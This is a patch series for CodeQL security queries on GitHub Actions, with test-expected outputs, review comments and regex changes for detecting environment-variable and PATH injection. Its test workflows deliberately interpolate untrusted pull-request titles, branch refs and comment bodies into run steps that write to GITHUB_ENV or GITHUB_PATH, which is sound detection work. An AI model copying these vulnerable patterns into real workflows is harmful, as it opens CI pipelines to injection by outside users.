.github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | | .github/workflows/expression_nodes.yml:12:24:12:51 | 
github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | | 
.github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | | .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| 
.github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | | .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | | .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | 
@@ -380,64 +419,67 @@ nodeLocations | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | 
.github/workflows/multiline.yml:1:1:33:14 | on: | | .github/workflows/test.yml:1:1:40:53 | on: push | sources -| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | -| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | -| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | -| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | -| dorny/paths-filter | * | output.changes | PR changed files | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added | PR changed files | manual | -| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.all | PR changed files | manual | -| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | -| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | -| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | -| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | -| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | -| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | -| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | -| 
tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | -| tj-actions/changed-files | * | output.added_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | -| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | -| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | -| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | -| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unknown_files | PR changed files | manual | -| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | -| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | -| trilom/file-changes-action | * | output.files | PR changed files | manual | -| trilom/file-changes-action | * | output.files_added | PR changed files | manual | -| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | -| trilom/file-changes-action | * | output.files_removed | 
PR changed files | manual | -| tzkhan/pr-update-action | * | output.headMatch | | manual | -| xt0rted/slash-command-action | * | output.command-arguments | | manual | +| ahmadnassri/action-changed-files | * | output.files | filename | manual | +| ahmadnassri/action-changed-files | * | output.json | json | manual | +| amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| dorny/paths-filter | * | output.changes | filename | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| jitterbit/get-changed-files | * | output.added | filename | manual | +| jitterbit/get-changed-files | * | output.added_modified | filename | manual | +| jitterbit/get-changed-files | * | output.all | filename | manual | +| jitterbit/get-changed-files | * | output.deleted | filename | manual | +| jitterbit/get-changed-files | * | output.modified | filename | manual | +| jitterbit/get-changed-files | * | output.removed | filename | manual | +| jitterbit/get-changed-files | * | output.renamed | filename | manual | +| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| marocchino/on_artifact | * | output.* | artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| tj-actions/branch-names | * | output.current_branch | branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | +| tj-actions/branch-names | * | output.ref_branch | branch | manual | +| tj-actions/changed-files | * | output.added_files 
| filename | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | filename | manual | +| tj-actions/changed-files | * | output.all_changed_files | filename | manual | +| tj-actions/changed-files | * | output.all_modified_files | filename | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | filename | manual | +| tj-actions/changed-files | * | output.changed_keys | filename | manual | +| tj-actions/changed-files | * | output.copied_files | filename | manual | +| tj-actions/changed-files | * | output.deleted_files | filename | manual | +| tj-actions/changed-files | * | output.modified_files | filename | manual | +| tj-actions/changed-files | * | output.modified_keys | filename | manual | +| tj-actions/changed-files | * | output.other_changed_files | filename | manual | +| tj-actions/changed-files | * | output.other_deleted_files | filename | manual | +| tj-actions/changed-files | * | output.other_modified_files | filename | manual | +| tj-actions/changed-files | * | output.renamed_files | filename | manual | +| tj-actions/changed-files | * | output.type_changed_files | filename | manual | +| tj-actions/changed-files | * | output.unknown_files | filename | manual | +| tj-actions/changed-files | * | output.unmerged_files | filename | manual | +| tj-actions/verify-changed-files | * | output.changed-files | filename | manual | +| trilom/file-changes-action | * | output.files | filename | manual | +| trilom/file-changes-action | * | output.files_added | filename | manual | +| trilom/file-changes-action | * | output.files_modified | filename | manual | +| trilom/file-changes-action | * | output.files_removed | filename | manual | +| tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| xt0rted/slash-command-action | * | output.command-arguments | text | manual | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | 
input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml index c3c94755efd..8ca103cbb6a 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -9,5 +9,7 @@ jobs: steps: - name: Code Injection, do not report as ENV VAR INJ run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + - name: Code Injection, do not report as ENV VAR INJ + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.head.ref }}") >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml index 733b15fc956..5061f51db62 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -45,5 +45,9 @@ jobs: cat <<-"EOF" >> "$GITHUB_ENV" echo "FOO=$TITLE" EOF + - env: + TITLE: ${{ github.event.pull_request.head.ref }} + run: | + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 56345ca896a..1cb0b78a29b 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected 
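Review bot: The step added to test4.yml binds `github.event.pull_request.head.ref` to an env var still named `TITLE` and writes it as `PR_TITLE=`, and the step added to test1.yml repeats the previous step's name verbatim, so neither fixture shows that it exercises the branch-ref source. Naming them after the source, e.g. `HEAD_REF: ${{ github.event.pull_request.head.ref }}` with `echo "HEAD_REF=$HEAD_REF" >> $GITHUB_ENV`, would keep the matching rows in EnvVarInjection.expected readable, though that file would need regenerating. Separately, git ref names cannot contain newlines, so this single-line `KEY=value` write probably lets a branch name control only that one variable's value rather than add further variables. If reporting it is intended, a fixture comment such as `# head.ref: single-line write, value-only control` would record that; if not, the new `test4.yml:49` to `test4.yml:50` edge is a false positive being pinned as expected output. The enclosing job definitions start outside both hunks.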
@@ -7,6 +7,7 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -25,6 +26,8 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected index 2dfa8702d59..af4b70d3a60 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected 
@@ -22,5 +22,4 @@ subpaths | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index f88785c38e1..701cefe2b79 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected 
@@ -7,6 +7,7 @@ edges | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -25,6 +26,8 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths From 0f3281c38627ed3d2d5e1812a701f52610209c27 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 28 Apr 2024 09:36:27 +0200 Subject: [PATCH 0226/1267] Support bash heredoc --- ql/lib/codeql/actions/Ast.qll | 38 ++++++++++++++++++- .../actions/security/EnvVarInjectionQuery.qll | 5 ++- ql/src/Security/CWE-077/EnvPathInjection.ql | 2 + ql/src/Security/CWE-077/EnvVarInjection.ql | 20 ++++++---- .../CWE-077/PrivilegedEnvPathInjection.ql | 6 +-- .../CWE-077/PrivilegedEnvVarInjection.ql | 24 ++++++------ .../CWE-077/.github/workflows/test4.yml | 9 ++++- .../Security/CWE-077/EnvVarInjection.expected | 9 +++-- .../PrivilegedEnvVarInjection.expected | 11 ++++-- 9 files changed, 92 insertions(+), 32 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8e36aef408e..bfbc990d671 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -46,18 +46,39 @@ module Utils { bindingset[var] private string multilineAssignmentRegex(string var) { + // eg: + // echo "PR_TITLE<> $GITHUB_ENV + // echo "$TITLE" >> $GITHUB_ENV + // echo "EOF" >> $GITHUB_ENV result = - ".*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?.*" } bindingset[var] private string multilineBlockAssignmentRegex(string var) { + // eg: + // { + // echo 'JSON_RESPONSE<> "$GITHUB_ENV" + // echo EOF + // } >> "$GITHUB_ENV" result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + "(\\})?(\"|')?.*" } + bindingset[var] + private string multilineHereDocAssignmentRegex(string var) { + // eg: + // cat <<-EOF >> "$GITHUB_ENV" + // echo "FOO=$TITLE" + // EOF + result = + ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + + "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" + } + bindingset[script, var] predicate extractMultilineAssignment(string script, string var, string key, string value) { // multiline assignment 
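Review bot: `multilineHereDocAssignmentRegex` only matches when the heredoc body contains `(echo|Write-Output)\\s+` in front of `KEY=`, but a heredoc redirected to the env file normally holds bare `KEY=value` lines, so a script of the form `cat <<EOF >> "$GITHUB_ENV"` followed by `FOO=$TITLE` would not be matched by this regex. The key should be anchored at the start of a body line (after `::NEW_LINE::`), with the `echo` prefix optional, and the capture-group numbers used in `extractMultilineAssignment` adjusted to match. The pattern also has a stray `.*` in `GITHUB_.*" + var.toUpperCase()`, whereas the two sibling regexes use `GITHUB_" + var.toUpperCase()`. As written, a redirect to a different `GITHUB_` file can match if the variable name appears later in the text.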
